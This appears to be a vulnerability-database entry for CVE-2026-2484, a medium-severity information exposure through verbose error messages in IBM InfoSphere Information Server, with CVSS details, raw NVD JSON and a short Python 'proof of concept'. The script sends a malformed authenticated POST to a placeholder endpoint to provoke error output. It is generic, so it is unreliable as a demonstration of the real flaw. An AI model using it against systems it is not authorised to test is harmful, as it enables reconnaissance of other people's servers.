Security Vulnerability Report
CVE-2026-2484 CVSS 4.3 MEDIUM

Published: 2026-03-25 21:16:41
Last Modified: 2026-03-31 19:01:10

Description

IBM InfoSphere Information Server 11.7.0.0 through 11.7.1.6 is affected by an information exposure vulnerability caused by overly verbose error messages.

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:ibm:infosphere_information_server:*:*:*:*:*:*:*:* - VULNERABLE
From (including): IBM InfoSphere Information Server 11.7.0.0
Up to (including): IBM InfoSphere Information Server 11.7.1.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept for CVE-2026-2484
# This script demonstrates sending a malformed request to trigger verbose error messages.
import requests

target_url = "http://target-server:port/ibm/iis/endpoint"  # Example endpoint
headers = {
    "User-Agent": "CVE-2026-2484-Scanner",
    "Authorization": "Basic <Base64_Credentials>"  # Requires low privilege (PR:L)
}

# Send a request with invalid parameters to trigger the error
payload = {
    "invalid_param": "trigger_error_123!!"
}

try:
    # Sending POST request to simulate the attack vector
    response = requests.post(target_url, headers=headers, data=payload, timeout=10)

    # Check if the response contains verbose error information
    if response.status_code != 200 and (
        "error" in response.text.lower() or "exception" in response.text.lower()
    ):
        print("[+] Vulnerability Detected!")
        print(f"[+] Status Code: {response.status_code}")
        print("[+] Verbose Error Information:")
        print(response.text)
    else:
        print("[-] Request did not trigger a verbose error message or target is not vulnerable.")
except Exception as e:
    print(f"[!] Error connecting to target: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-2484", "sourceIdentifier": "[email protected]", "published": "2026-03-25T21:16:41.100", "lastModified": "2026-03-31T19:01:10.060", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM InfoSphere Information Server 11.7.0.0 through 11.7.1.6 is affected by an information exposure vulnerability caused by overly verbose error messages"}, {"lang": "es", "value": "IBM InfoSphere Information Server 11.7.0.0 hasta 11.7.1.6 se ve afectado por una vulnerabilidad de exposición de información causada por mensajes de error excesivamente detallados."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-209"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:infosphere_information_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.7.0.0", "versionEndIncluding": "11.7.1.6", "matchCriteriaId": "65FBF88B-61F0-4D42-A290-453FDC874D7F"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7266767", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}